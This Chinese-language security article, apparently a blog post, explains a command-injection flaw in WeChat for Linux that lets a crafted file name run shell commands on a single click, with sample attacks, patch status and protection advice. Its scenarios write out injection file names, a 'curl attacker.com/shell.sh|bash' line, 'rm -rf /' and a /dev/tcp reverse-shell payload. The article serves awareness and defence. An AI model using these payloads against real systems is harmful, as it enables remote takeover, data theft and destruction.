2026年初,微信Linux版曝出1-Click命令注入高危漏洞(QVD-2026-7687),CVSS评分高达8.8。核心危害仅需点击一次恶意文件名文件,即可触发远程代码执行(RCE),无需复杂操作,攻击者可直接获取系统权限、窃取数据或植入恶意程序,对Linux用户尤其是信创场景(麒麟、统信UOS等)威胁极大。
漏洞核心:为什么“点击即中招”?
该漏洞源于微信Linux版(≤4.1.0.13)文件处理模块的安全校验缺陷——未对文件名中的特殊字符(反引号 、$()等)进行过滤与转义。 Linux系统中, (反引号)和 $()`是命令替换符,系统会优先执行符号内的命令。微信客户端在处理文件点击、打开或另存为操作时,会将文件名传入系统Shell执行,若文件名包含恶意命令,Shell会误将其当作合法指令执行,实现1-Click一键触发。
值得注意的是,攻击者无需修改文件内容,仅需构造恶意文件名即可发起攻击,隐蔽性极强。
真实攻击场景:3个典型案例
案例1:办公场景的“财务报表陷阱”
某公司员工小李使用Linux系统办公,日常习惯通过微信接收同事发送的各类报表。某日,他在微信中收到同事转发的“财务报表 kcalc .pdf”文件,以为是正常的财务数据文件,点击打开后,系统突然弹出计算器程序。
小李起初以为是系统故障,后续经安全团队排查才发现,文件名中的 kcalc 是Linux系统计算器启动命令,反引号让系统优先执行了该命令。若攻击者将命令替换为 rm -rf / (强制删除系统文件)或 curl http://attacker.com/shell.sh|bash (下载并执行恶意脚本),小李的电脑将瞬间被控制或数据被清空。
案例2:信创场景的“核心数据窃取”
某能源企业部署统信UOS Linux系统,依赖微信Linux版传输核心业务文件。攻击者通过社工手段添加企业员工为好友,发送名为“项目方案 whoami .docx”的文件。
员工点击后,攻击者通过 whoami 命令获取当前用户权限,进一步利用权限窃取了企业核心项目文档。由于信创场景涉及大量关键业务数据,此次攻击直接导致企业核心信息泄露,造成严重经济损失。
3:隐蔽性更强的“远程控制攻击”
攻击者先通过网络情报收集目标Linux设备的IP地址,随后构造恶意文件名 test$(bash -i >& /dev/tcp/10.10.10.129/9001 0>&1).png 。
当目标用户在微信Linux版中点击该图片文件时,系统会执行反弹Shell命令,攻击者的服务器(10.10.10.129)成功获取目标设备的远程控制权限,可随时查看设备文件、安装恶意程序,甚至横向攻击企业内网其他系统。
漏洞修复与防护指南
已修复状态
腾讯已通过服务端拦截+客户端过滤双重机制彻底修复该漏洞:
1. 服务端:直接拦截含恶意特殊字符的文件上传,从源头阻断攻击路径;
2. 客户端:微信Linux版4.1.0.16及以上版本已新增文件名过滤规则,彻底屏蔽危险字符。
防护建议
1. 立即更新客户端:Linux用户打开微信Linux版,检查并更新至最新版本,避免使用旧版;
2. 谨慎接收文件:不接收陌生人、可疑来源的文件,优先通过企业微信等正规渠道传输文件;
3. 权限最小化:切勿以root权限运行微信Linux版,降低漏洞被利用后的危害范围;
4. 安装终端安全软件:如火绒等,可实时拦截恶意命令执行行为,补充防护能力。
总结
微信Linux版1-Click漏洞的核心警示意义在于:安全不再是“复杂操作才会中招”,简单的一次点击也可能引发严重后果。尤其对Linux信创用户而言,需高度重视文件接收与点击安全,及时更新软件并强化安全意识,才能有效防范此类高危攻击。
关注我,不迷路
